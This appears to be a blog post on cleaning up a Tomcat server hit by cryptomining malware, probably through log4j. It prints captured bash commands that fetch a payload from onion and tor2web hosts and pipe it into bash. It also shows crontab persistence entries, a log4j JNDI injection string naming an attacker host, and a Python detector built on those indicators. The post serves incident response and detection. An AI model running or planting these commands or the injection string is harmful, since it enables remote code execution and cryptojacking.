Malware Running Bash Process Communicating With Tor2web Sites

If you see the following processes running on your server, then your server is most likely infected with bitcoin mining malware.

$ ps -ef
...
tomcat    1710  1695  0 11:21 ?        00:00:00 /bin/bash -c n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr " " "\n"|sort -uR|head -1);FETCH_OPTS="-fsSLk --connect-timeout 26 --max-time 75";(curl -x socks5h://$s:9050 bvprzqhoz7j2ltin.onion/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.tor2web.su/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ly/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ws/src/ldm)|bash
tomcat    1725  1710  0 11:21 ?        00:00:00 /bin/bash -c n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr " " "\n"|sort -uR|head -1);FETCH_OPTS="-fsSLk --connect-timeout 26 --max-time 75";(curl -x socks5h://$s:9050 bvprzqhoz7j2ltin.onion/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.tor2web.su/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ly/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ws/src/ldm)|bash
tomcat    1727  1725  0 11:21 ?        00:00:00 curl https://doh.centraleu.pi-dns.com/dns-query?name=relay.l33t-ppl.info
tomcat    1728  1725  0 11:21 ?        00:00:00 grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b
tomcat    1729  1725  0 11:21 ?        00:00:00 tr   \n
tomcat    1730  1725  0 11:21 ?        00:00:00 sort -uR
tomcat    1731  1725  0 11:21 ?        00:00:00 head -1

How did they get into the server?

There are several possibilities; however, in recent days the major reason is the log4j2 security issue.

e.g. if you are logging the username during login as follows

log.debug("Username : {}", username);

then if the hacker enters the username as ${jndi:ldap://attackerserver.com.com/x}, the log4j process treats this as a JNDI lookup instead of logging it as a string. Yeah :-)

Hackers use this JNDI lookup to point to their own server, download scripts, etc. and run them on your server. They are also smart enough to make their scripts start during system startup.

How to clean this up?

If you are running the server in the cloud, such as AWS or Google, then it is better to relaunch a new instance based on a previous image that wasn't infected.

If you can't do that for whatever reason, then you may try the following approach to clean up.

Check and Cleanup the startup process

Check which user is running the above-mentioned processes and switch to that user. E.g. in the above example the processes were running as tomcat, so switch user as follows.

$ sudo su tomcat

Check the crontab to see the startup process

$ crontab -e

It should probably show the following (in addition to any entries you already configured):

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=''
HOME=/
* * * * * /tmp/pty3 > /dev/null 2>&1 &
* * * * * /dev/shm/pty3 > /dev/null 2>&1 &
* * * * * /var/lock/pty3 > /dev/null 2>&1 &
* * * * * n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is

Remove all of these entries.

In the application user's directory, check whether any new files have been created, e.g. in the tomcat bin, logs and etc directories, and delete them if you are sure they are not part of the application and they look suspicious. (Take care here not to delete any application or OS-specific files.)

Restart your server. You should most probably not see those bash processes anymore.
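To check a host for the indicators shown above (the DoH lookup, the socks5h/tor2web fetch piped into bash, and cron entries launching a dropper from /tmp, /dev/shm or /var/lock), here is an added Python example, not part of the original post. It scans `ps -ef` output and a crontab dump; the sample input is a constructed, shortened copy of the listing above plus a benign row.

```python
import re

# Indicator patterns drawn from the process listing and crontab shown above.
INDICATORS = {
    "DoH lookup":        re.compile(r"dns-query\?name="),
    "onion via socks5h": re.compile(r"socks5h://[^ ]+:9050\s+\S+\.onion"),
    "tor2web gateway":   re.compile(r"\.(tor2web\.su|onion\.(ly|ws))\b"),
    "pipe to bash":      re.compile(r"\)\s*\|\s*bash\b"),
    "tmp/shm dropper":   re.compile(r"(^|\s)/(tmp|dev/shm|var/lock)/\S+"),
}

def scan_line(text):
    """Return the names of all indicators that match one command or cron entry."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_ps(ps_output):
    """Parse `ps -ef` text; return (pid, user, indicators) for each suspicious row."""
    hits = []
    for line in ps_output.splitlines():
        parts = line.split(None, 7)           # UID PID PPID C STIME TTY TIME CMD
        if len(parts) < 8 or not parts[1].isdigit():
            continue                          # header, '...' and blank lines
        found = scan_line(parts[7])
        if found:
            hits.append((int(parts[1]), parts[0], found))
    return hits

def scan_crontab(crontab_text):
    """Return (entry, indicators) for each crontab line that matches an indicator."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.startswith("#") or re.match(r"\w+=", line):
            continue                          # comments and SHELL=/PATH= assignments
        found = scan_line(line)
        if found:
            hits.append((line, found))
    return hits

# Constructed sample input: shortened copy of the listing above plus a benign row.
SAMPLE_PS = r"""UID        PID  PPID  C STIME TTY          TIME CMD
tomcat    1710  1695  0 11:21 ?        00:00:00 /bin/bash -c n=(doh.defaultroutes.de dns.hostux.net);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM%2))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | sort -uR | head -1);(curl -x socks5h://$s:9050 bvprzqhoz7j2ltin.onion/src/ldm || curl -fsSLk https://bvprzqhoz7j2ltin.tor2web.su/src/ldm)|bash
tomcat    1727  1725  0 11:21 ?        00:00:00 curl https://doh.centraleu.pi-dns.com/dns-query?name=relay.l33t-ppl.info
root       912     1  0 11:00 ?        00:00:03 /usr/sbin/cron -f
"""
SAMPLE_CRONTAB = """SHELL=/bin/bash
* * * * * /tmp/pty3 > /dev/null 2>&1 &
* * * * * /dev/shm/pty3 > /dev/null 2>&1 &
0 2 * * * /opt/app/bin/rotate-logs.sh
"""
```

On a live host, feed the text of `ps -ef` and `crontab -l` (for the application user) into scan_ps and scan_crontab; each hit lists which of the page's indicators matched, so a benign cron job or a normal curl call is not flagged.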
